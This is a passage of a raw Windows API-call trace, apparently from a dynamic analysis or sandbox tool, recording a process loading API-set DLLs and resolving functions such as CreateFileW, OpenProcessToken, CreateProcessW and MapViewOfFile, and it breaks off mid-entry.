0x0 [0312.189] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="AcquireSRWLockExclusive" | out: DestinationString="AcquireSRWLockExclusive") [0312.189] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="AcquireSRWLockExclusive", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777ad210) returned 0x0 [0312.189] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="ReleaseSRWLockShared" | out: DestinationString="ReleaseSRWLockShared") [0312.189] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="ReleaseSRWLockShared", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77794860) returned 0x0 [0312.190] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="InitializeSRWLock" | out: DestinationString="InitializeSRWLock") [0312.190] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="InitializeSRWLock", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77786710) returned 0x0 [0312.190] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CreateEventW" | out: DestinationString="CreateEventW") [0312.190] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CreateEventW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6d130) returned 0x0 [0312.190] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="AcquireSRWLockShared" | out: DestinationString="AcquireSRWLockShared") [0312.190] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="AcquireSRWLockShared", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777946f0) returned 0x0 [0312.190] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="Sleep" | out: DestinationString="Sleep") [0312.190] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7a4e0) returned 0x0 [0312.190] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-file-l1-2-1.dll" | out: Destination="api-ms-win-core-file-l1-2-1.dll") returned 1 [0312.190] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-file-l1-2-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.191] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="FindFirstFileW" | out: DestinationString="FindFirstFileW") [0312.191] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="FindFirstFileW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b70650) returned 0x0 [0312.191] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetFileSize" | out: DestinationString="GetFileSize") [0312.191] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetFileSize", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7c180) returned 0x0 [0312.191] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetLogicalDrives" | out: DestinationString="GetLogicalDrives") [0312.191] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetLogicalDrives", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b9b0e0) returned 0x0 [0312.191] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="ReadFile" | out: DestinationString="ReadFile") [0312.191] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="ReadFile", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6ef70) returned 0x0 [0312.191] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="FindClose" | out: DestinationString="FindClose") [0312.192] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="FindClose", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7d1b0) returned 0x0 [0312.192] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="SetFileTime" | out: DestinationString="SetFileTime") [0312.192] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="SetFileTime", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b93030) returned 0x0 [0312.192] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CreateFileW" | out: DestinationString="CreateFileW") [0312.192] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CreateFileW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6d670) returned 0x0 [0312.192] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="FindNextFileW" | out: DestinationString="FindNextFileW") [0312.192] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="FindNextFileW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6c970) returned 0x0 [0312.192] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-errorhandling-l1-1-1.dll" | out: Destination="api-ms-win-core-errorhandling-l1-1-1.dll") returned 1 [0312.192] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-errorhandling-l1-1-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.192] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="SetLastError" | out: DestinationString="SetLastError") [0312.193] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="SetLastError", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777b8380) returned 0x0 [0312.193] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="SetUnhandledExceptionFilter" | out: DestinationString="SetUnhandledExceptionFilter") [0312.193] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="SetUnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b82000) returned 0x0 [0312.193] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetLastError" | out: DestinationString="GetLastError") [0312.193] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6f220) returned 0x0 [0312.193] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="UnhandledExceptionFilter" | out: DestinationString="UnhandledExceptionFilter") [0312.193] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="UnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75bff2f0) returned 0x0 [0312.193] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-processthreads-l1-1-2.dll" | out: Destination="api-ms-win-core-processthreads-l1-1-2.dll") returned 1 [0312.193] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-processthreads-l1-1-2.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.194] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="ProcessIdToSessionId" | out: DestinationString="ProcessIdToSessionId") [0312.194] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="ProcessIdToSessionId", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca8fa0) returned 0x0 [0312.194] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="ExitThread" | out: DestinationString="ExitThread") [0312.194] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="ExitThread", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777c7a80) returned 0x0 [0312.194] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="TlsSetValue" | out: DestinationString="TlsSetValue") [0312.194] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="TlsSetValue", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca29d0) returned 0x0 [0312.194] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetCurrentProcessId" | out: DestinationString="GetCurrentProcessId") [0312.194] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca23e0) returned 0x0 [0312.194] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetCurrentThread" | out: DestinationString="GetCurrentThread") [0312.195] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetCurrentThread", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca75f0) returned 0x0 [0312.195] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="TlsGetValue" | out: DestinationString="TlsGetValue") [0312.195] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="TlsGetValue", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca1b70) returned 0x0 [0312.195] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetCurrentProcess" | out: DestinationString="GetCurrentProcess") [0312.195] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca38c0) returned 0x0 [0312.195] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="OpenProcessToken" | out: DestinationString="OpenProcessToken") [0312.195] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="OpenProcessToken", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b5daa0) returned 0x0 [0312.195] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CreateProcessW" | out: DestinationString="CreateProcessW") [0312.195] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="CreateProcessW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cab000) returned 0x0 [0312.195] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CreateThread" | out: DestinationString="CreateThread") [0312.196] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="CreateThread", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca9b90) returned 0x0 [0312.196] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="OpenThreadToken" | out: DestinationString="OpenThreadToken") [0312.196] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="OpenThreadToken", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6f0f0) returned 0x0 [0312.196] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetCurrentThreadId" | out: DestinationString="GetCurrentThreadId") [0312.196] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca1b90) returned 0x0 [0312.196] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetProcessMitigationPolicy" | out: DestinationString="GetProcessMitigationPolicy") [0312.196] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetProcessMitigationPolicy", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b82ed0) returned 0x0 [0312.196] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="TerminateProcess" | out: DestinationString="TerminateProcess") [0312.196] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cb5100) returned 0x0 [0312.196] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetExitCodeThread" | out: DestinationString="GetExitCodeThread") [0312.197] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetExitCodeThread", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cb4f40) returned 0x0 [0312.197] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="OpenProcess" | out: DestinationString="OpenProcess") [0312.197] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="OpenProcess", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74ca8bf0) returned 0x0 [0312.197] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-libraryloader-l1-2-1.dll" | out: Destination="api-ms-win-core-libraryloader-l1-2-1.dll") returned 1 [0312.197] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-libraryloader-l1-2-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.197] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LoadLibraryW" | out: DestinationString="LoadLibraryW") [0312.197] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LoadLibraryW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b70ce0) returned 0x0 [0312.197] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-sysinfo-l1-2-1.dll" | out: Destination="api-ms-win-core-sysinfo-l1-2-1.dll") returned 1 [0312.197] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-sysinfo-l1-2-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.198] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetSystemWindowsDirectoryW" | out: DestinationString="GetSystemWindowsDirectoryW") [0312.198] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetSystemWindowsDirectoryW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b824e0) returned 0x0 [0312.277] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetSystemTimeAsFileTime" | out: DestinationString="GetSystemTimeAsFileTime") [0312.277] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7a440) returned 0x0 [0312.277] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetTickCount" | out: DestinationString="GetTickCount") [0312.277] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b76f30) returned 0x0 [0312.277] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetSystemDirectoryW" | out: DestinationString="GetSystemDirectoryW") [0312.278] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetSystemDirectoryW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b71850) returned 0x0 [0312.278] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetVersionExW" | out: DestinationString="GetVersionExW") [0312.278] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetVersionExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b70fe0) returned 0x0 [0312.278] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-processenvironment-l1-2-0.dll" | out: Destination="api-ms-win-core-processenvironment-l1-2-0.dll") returned 1 [0312.278] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-processenvironment-l1-2-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.278] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="SetCurrentDirectoryW" | out: DestinationString="SetCurrentDirectoryW") [0312.278] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="SetCurrentDirectoryW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b91f60) returned 0x0 [0312.278] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="ExpandEnvironmentStringsW" | out: DestinationString="ExpandEnvironmentStringsW") [0312.279] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="ExpandEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b64e00) returned 0x0 [0312.279] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetCurrentDirectoryW" | out: DestinationString="GetCurrentDirectoryW") [0312.279] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetCurrentDirectoryW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b85ad0) returned 0x0 [0312.279] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="SearchPathW" | out: DestinationString="SearchPathW") [0312.279] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="SearchPathW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b89580) returned 0x0 [0312.279] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-security-base-l1-2-0.dll" | out: Destination="api-ms-win-security-base-l1-2-0.dll") returned 1 [0312.279] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-security-base-l1-2-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.279] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CopySid" | out: DestinationString="CopySid") [0312.279] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CopySid", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7d770) returned 0x0 [0312.279] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetTokenInformation" | out: DestinationString="GetTokenInformation") [0312.280] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetTokenInformation", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6cda0) returned 0x0 [0312.280] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetLengthSid" | out: DestinationString="GetLengthSid") [0312.280] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetLengthSid", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7d800) returned 0x0 [0312.280] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CheckTokenMembership" | out: DestinationString="CheckTokenMembership") [0312.280] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CheckTokenMembership", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b84130) returned 0x0 [0312.280] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-string-l2-1-0.dll" | out: Destination="api-ms-win-core-string-l2-1-0.dll") returned 1 [0312.280] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-string-l2-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.280] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CharLowerW" | out: DestinationString="CharLowerW") [0312.280] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CharLowerW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b687e0) returned 0x0 [0312.280] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CharLowerBuffW" | out: DestinationString="CharLowerBuffW") [0312.281] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CharLowerBuffW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b9ae40) returned 0x0 [0312.281] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="IsCharUpperW" | out: DestinationString="IsCharUpperW") [0312.281] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="IsCharUpperW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75bc2b90) returned 0x0 [0312.281] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CharUpperBuffW" | out: DestinationString="CharUpperBuffW") [0312.281] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CharUpperBuffW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b84db0) returned 0x0 [0312.281] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="IsCharLowerW" | out: DestinationString="IsCharLowerW") [0312.281] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="IsCharLowerW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b88800) returned 0x0 [0312.281] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CharNextW" | out: DestinationString="CharNextW") [0312.282] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CharNextW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7a620) returned 0x0 [0312.282] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="IsCharAlphaNumericW" | out: DestinationString="IsCharAlphaNumericW") [0312.282] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="IsCharAlphaNumericW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b86fb0) returned 0x0 [0312.282] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="IsCharAlphaW" | out: DestinationString="IsCharAlphaW") [0312.282] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="IsCharAlphaW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b9b120) returned 0x0 [0312.282] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CharUpperW" | out: DestinationString="CharUpperW") [0312.282] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CharUpperW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b69510) returned 0x0 [0312.282] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CharPrevW" | out: DestinationString="CharPrevW") [0312.282] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CharPrevW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7a060) returned 0x0 [0312.282] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-handle-l1-1-0.dll" | out: Destination="api-ms-win-core-handle-l1-1-0.dll") returned 1 [0312.282] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-handle-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.283] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CloseHandle" | out: DestinationString="CloseHandle") [0312.283] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6df10) returned 0x0 [0312.283] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-memory-l1-1-2.dll" | out: Destination="api-ms-win-core-memory-l1-1-2.dll") returned 1 [0312.283] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-memory-l1-1-2.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.283] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="MapViewOfFile" | out: DestinationString="MapViewOfFile") [0312.283] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="MapViewOfFile", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7a6f0) returned 0x0 [0312.283] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="VirtualQueryEx" | out: DestinationString="VirtualQueryEx") [0312.283] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="VirtualQueryEx", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b821a0) returned 0x0 [0312.283] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="UnmapViewOfFile" | out: DestinationString="UnmapViewOfFile") [0312.284] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7cdc0) returned 0x0 [0312.284] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="MapViewOfFileEx" | out: DestinationString="MapViewOfFileEx") [0312.284] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="MapViewOfFileEx", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7e2b0) returned 0x0 [0312.284] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="OpenFileMappingW" | out: DestinationString="OpenFileMappingW") [0312.284] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="OpenFileMappingW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6c8c0) returned 0x0 [0312.284] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CreateFileMappingW" | out: DestinationString="CreateFileMappingW") [0312.284] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CreateFileMappingW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6d170) returned 0x0 [0312.284] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-profile-l1-1-0.dll" | out: Destination="api-ms-win-core-profile-l1-1-0.dll") returned 1 [0312.285] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-profile-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.285] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="QueryPerformanceCounter" | out: DestinationString="QueryPerformanceCounter") [0312.285] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="QueryPerformanceCounter", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777b93a0) returned 0x0 [0312.285] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="QueryPerformanceFrequency" | out: DestinationString="QueryPerformanceFrequency") [0312.285] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="QueryPerformanceFrequency", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777bfb80) returned 0x0 [0312.285] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-privateprofile-l1-1-1.dll" | out: Destination="api-ms-win-core-privateprofile-l1-1-1.dll") returned 1 [0312.285] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-privateprofile-l1-1-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.285] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="WritePrivateProfileStringW" | out: DestinationString="WritePrivateProfileStringW") [0312.286] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="WritePrivateProfileStringW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cb0180) returned 0x0 [0312.286] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetPrivateProfileStringW" | out: DestinationString="GetPrivateProfileStringW") [0312.286] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GetPrivateProfileStringW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x74cb09a0) returned 0x0 [0312.286] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-atoms-l1-1-0.dll" | out: Destination="api-ms-win-core-atoms-l1-1-0.dll") returned 1 [0312.286] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-atoms-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x74c90000) returned 0x0 [0312.286] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalAddAtomA" | out: DestinationString="GlobalAddAtomA") [0312.286] LdrGetProcedureAddress (in: BaseAddress=0x74c90000, Name="GlobalAddAtomA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: 